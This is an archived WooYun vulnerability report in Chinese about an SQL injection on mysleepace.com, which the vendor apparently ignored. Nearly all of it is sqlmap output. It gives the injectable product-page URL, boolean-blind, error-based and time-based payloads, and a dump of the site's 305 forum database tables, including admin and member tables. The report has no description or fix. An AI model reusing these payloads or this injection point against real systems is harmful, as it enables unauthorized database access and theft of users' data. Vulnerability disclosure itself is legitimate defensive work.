当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0179392

漏洞标题:sleepace主站存在SQL注入漏洞

相关厂商:mysleepace.com

漏洞作者: 路人甲

提交时间:2016-02-29 14:20

修复时间:2016-03-05 14:30

公开时间:2016-03-05 14:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:14

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-02-29: 细节已通知厂商并且等待厂商处理中
2016-03-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

http://www.mysleepace.com/cn/Index/goods/id/2*/nav/2/attr/0/shop_count/1/p/2/0/shop_count.html

6.png

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.mysleepace.com:80/cn/Index/goods/id/2) AND 9555=9555 AND (4183=4183/nav/2/attr/0/shop_count/1/p/2/0/shop_count.html
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://www.mysleepace.com:80/cn/Index/goods/id/2) AND (SELECT 8097 FROM(SELECT COUNT(*),CONCAT(0x71786a6a71,(SELECT (ELT(8097=8097,1))),0x7162787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (5756=5756/nav/2/attr/0/shop_count/1/p/2/0/shop_count.html
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://www.mysleepace.com:80/cn/Index/goods/id/2) AND (SELECT * FROM (SELECT(SLEEP(5)))ZjmW) AND (1624=1624/nav/2/attr/0/shop_count/1/p/2/0/shop_count.html
---
web application technology: Nginx
back-end DBMS: MySQL 5.0
Database: bbs
[305 tables]
+-----------------------------------+
| bbs_common_admincp_cmenu |
| bbs_common_admincp_group |
| bbs_common_admincp_member |
| bbs_common_admincp_perm |
| bbs_common_admincp_session |
| bbs_common_admingroup |
| bbs_common_adminnote |
| bbs_common_advertisement |
| bbs_common_advertisement_custom |
| bbs_common_banned |
| bbs_common_block |
| bbs_common_block_favorite |
| bbs_common_block_item |
| bbs_common_block_item_data |
| bbs_common_block_permission |
| bbs_common_block_pic |
| bbs_common_block_style |
| bbs_common_block_xml |
| bbs_common_cache |
| bbs_common_card |
| bbs_common_card_log |
| bbs_common_card_type |
| bbs_common_connect_guest |
| bbs_common_credit_log |
| bbs_common_credit_log_field |
| bbs_common_credit_rule |
| bbs_common_credit_rule_log |
| bbs_common_credit_rule_log_field |
| bbs_common_cron |
| bbs_common_devicetoken |
| bbs_common_district |
| bbs_common_diy_data |
| bbs_common_domain |
| bbs_common_failedip |
| bbs_common_failedlogin |
| bbs_common_friendlink |
| bbs_common_grouppm |
| bbs_common_invite |
| bbs_common_magic |
| bbs_common_magiclog |
| bbs_common_mailcron |
| bbs_common_mailqueue |
| bbs_common_member |
| bbs_common_member_action_log |
| bbs_common_member_connect |
| bbs_common_member_count |
| bbs_common_member_crime |
| bbs_common_member_field_forum |
| bbs_common_member_field_home |
| bbs_common_member_forum_buylog |
| bbs_common_member_grouppm |
| bbs_common_member_log |
| bbs_common_member_magic |
| bbs_common_member_medal |
| bbs_common_member_newprompt |
| bbs_common_member_profile |
| bbs_common_member_profile_setting |
| bbs_common_member_security |
| bbs_common_member_secwhite |
| bbs_common_member_stat_field |
| bbs_common_member_status |
| bbs_common_member_validate |
| bbs_common_member_verify |
| bbs_common_member_verify_info |
| bbs_common_member_wechat |
| bbs_common_member_wechatmp |
| bbs_common_myapp |
| bbs_common_myinvite |
| bbs_common_mytask |
| bbs_common_nav |
| bbs_common_onlinetime |
| bbs_common_optimizer |
| bbs_common_patch |
| bbs_common_plugin |
| bbs_common_pluginvar |
| bbs_common_process |
| bbs_common_regip |
| bbs_common_relatedlink |
| bbs_common_remote_port |
| bbs_common_report |
| bbs_common_searchindex |
| bbs_common_seccheck |
| bbs_common_secquestion |
| bbs_common_session |
| bbs_common_setting |
| bbs_common_smiley |
| bbs_common_sphinxcounter |
| bbs_common_stat |
| bbs_common_statuser |
| bbs_common_style |
| bbs_common_stylevar |
| bbs_common_syscache |
| bbs_common_tag |
| bbs_common_tagitem |
| bbs_common_task |
| bbs_common_taskvar |
| bbs_common_template |
| bbs_common_template_block |
| bbs_common_template_permission |
| bbs_common_uin_black |
| bbs_common_usergroup |
| bbs_common_usergroup_field |
| bbs_common_visit |
| bbs_common_word |
| bbs_common_word_type |
| bbs_connect_disktask |
| bbs_connect_feedlog |
| bbs_connect_memberbindlog |
| bbs_connect_postfeedlog |
| bbs_connect_tthreadlog |
| bbs_forum_access |
| bbs_forum_activity |
| bbs_forum_activityapply |
| bbs_forum_announcement |
| bbs_forum_attachment |
| bbs_forum_attachment_0 |
| bbs_forum_attachment_1 |
| bbs_forum_attachment_2 |
| bbs_forum_attachment_3 |
| bbs_forum_attachment_4 |
| bbs_forum_attachment_5 |
| bbs_forum_attachment_6 |
| bbs_forum_attachment_7 |
| bbs_forum_attachment_8 |
| bbs_forum_attachment_9 |
| bbs_forum_attachment_exif |
| bbs_forum_attachment_unused |
| bbs_forum_attachtype |
| bbs_forum_bbcode |
| bbs_forum_collection |
| bbs_forum_collectioncomment |
| bbs_forum_collectionfollow |
| bbs_forum_collectioninvite |
| bbs_forum_collectionrelated |
| bbs_forum_collectionteamworker |
| bbs_forum_collectionthread |
| bbs_forum_creditslog |
| bbs_forum_debate |
| bbs_forum_debatepost |
| bbs_forum_faq |
| bbs_forum_filter_post |
| bbs_forum_forum |
| bbs_forum_forum_threadtable |
| bbs_forum_forumfield |
| bbs_forum_forumrecommend |
| bbs_forum_groupcreditslog |
| bbs_forum_groupfield |
| bbs_forum_groupinvite |
| bbs_forum_grouplevel |
| bbs_forum_groupuser |
| bbs_forum_hotreply_member |
| bbs_forum_hotreply_number |
| bbs_forum_imagetype |
| bbs_forum_medal |
| bbs_forum_medallog |
| bbs_forum_memberrecommend |
| bbs_forum_moderator |
| bbs_forum_modwork |
| bbs_forum_newthread |
| bbs_forum_onlinelist |
| bbs_forum_order |
| bbs_forum_poll |
| bbs_forum_polloption |
| bbs_forum_polloption_image |
| bbs_forum_pollvoter |
| bbs_forum_post |
| bbs_forum_post_location |
| bbs_forum_post_moderate |
| bbs_forum_post_tableid |
| bbs_forum_postcache |
| bbs_forum_postcomment |
| bbs_forum_postlog |
| bbs_forum_poststick |
| bbs_forum_promotion |
| bbs_forum_ratelog |
| bbs_forum_relatedthread |
| bbs_forum_replycredit |
| bbs_forum_rsscache |
| bbs_forum_sofa |
| bbs_forum_spacecache |
| bbs_forum_statlog |
| bbs_forum_thread |
| bbs_forum_thread_moderate |
| bbs_forum_threadaddviews |
| bbs_forum_threadcalendar |
| bbs_forum_threadclass |
| bbs_forum_threadclosed |
| bbs_forum_threaddisablepos |
| bbs_forum_threadhidelog |
| bbs_forum_threadhot |
| bbs_forum_threadimage |
| bbs_forum_threadlog |
| bbs_forum_threadmod |
| bbs_forum_threadpartake |
| bbs_forum_threadpreview |
| bbs_forum_threadprofile |
| bbs_forum_threadprofile_group |
| bbs_forum_threadrush |
| bbs_forum_threadtype |
| bbs_forum_trade |
| bbs_forum_tradecomment |
| bbs_forum_tradelog |
| bbs_forum_typeoption |
| bbs_forum_typeoptionvar |
| bbs_forum_typevar |
| bbs_forum_warning |
| bbs_home_album |
| bbs_home_album_category |
| bbs_home_appcreditlog |
| bbs_home_blacklist |
| bbs_home_blog |
| bbs_home_blog_category |
| bbs_home_blog_moderate |
| bbs_home_blogfield |
| bbs_home_class |
| bbs_home_click |
| bbs_home_clickuser |
| bbs_home_comment |
| bbs_home_comment_moderate |
| bbs_home_docomment |
| bbs_home_doing |
| bbs_home_doing_moderate |
| bbs_home_favorite |
| bbs_home_feed |
| bbs_home_feed_app |
| bbs_home_follow |
| bbs_home_follow_feed |
| bbs_home_follow_feed_archiver |
| bbs_home_friend |
| bbs_home_friend_request |
| bbs_home_friendlog |
| bbs_home_notification |
| bbs_home_pic |
| bbs_home_pic_moderate |
| bbs_home_picfield |
| bbs_home_poke |
| bbs_home_pokearchive |
| bbs_home_share |
| bbs_home_share_moderate |
| bbs_home_show |
| bbs_home_specialuser |
| bbs_home_userapp |
| bbs_home_userappfield |
| bbs_home_visitor |
| bbs_mobile_setting |
| bbs_mobile_wechat_authcode |
| bbs_mobile_wechat_masssend |
| bbs_mobile_wechat_resource |
| bbs_mobile_wsq_threadlist |
| bbs_plugin_k_misign |
| bbs_plugin_k_misign_bq |
| bbs_plugin_k_misign_lastrule |
| bbs_plugin_k_misign_prize |
| bbs_plugin_k_misign_prize_kami |
| bbs_plugin_k_misign_prize_log |
| bbs_plugin_k_misign_push |
| bbs_plugin_k_misignset |
| bbs_portal_article_content |
| bbs_portal_article_count |
| bbs_portal_article_moderate |
| bbs_portal_article_related |
| bbs_portal_article_title |
| bbs_portal_article_trash |
| bbs_portal_attachment |
| bbs_portal_category |
| bbs_portal_category_permission |
| bbs_portal_comment |
| bbs_portal_comment_moderate |
| bbs_portal_rsscache |
| bbs_portal_topic |
| bbs_portal_topic_pic |
| bbs_security_evilpost |
| bbs_security_eviluser |
| bbs_security_failedlog |
| bbs_ucenter_admins |
| bbs_ucenter_applications |
| bbs_ucenter_badwords |
| bbs_ucenter_domains |
| bbs_ucenter_failedlogins |
| bbs_ucenter_feeds |
| bbs_ucenter_friends |
| bbs_ucenter_mailqueue |
| bbs_ucenter_memberfields |
| bbs_ucenter_members |
| bbs_ucenter_mergemembers |
| bbs_ucenter_newpm |
| bbs_ucenter_notelist |
| bbs_ucenter_pm_indexes |
| bbs_ucenter_pm_lists |
| bbs_ucenter_pm_members |
| bbs_ucenter_pm_messages_0 |
| bbs_ucenter_pm_messages_1 |
| bbs_ucenter_pm_messages_2 |
| bbs_ucenter_pm_messages_3 |
| bbs_ucenter_pm_messages_4 |
| bbs_ucenter_pm_messages_5 |
| bbs_ucenter_pm_messages_6 |
| bbs_ucenter_pm_messages_7 |
| bbs_ucenter_pm_messages_8 |
| bbs_ucenter_pm_messages_9 |
| bbs_ucenter_protectedmembers |
| bbs_ucenter_settings |
| bbs_ucenter_sqlcache |
| bbs_ucenter_tags |
| bbs_ucenter_vars |
+-----------------------------------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-03-05 14:30

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无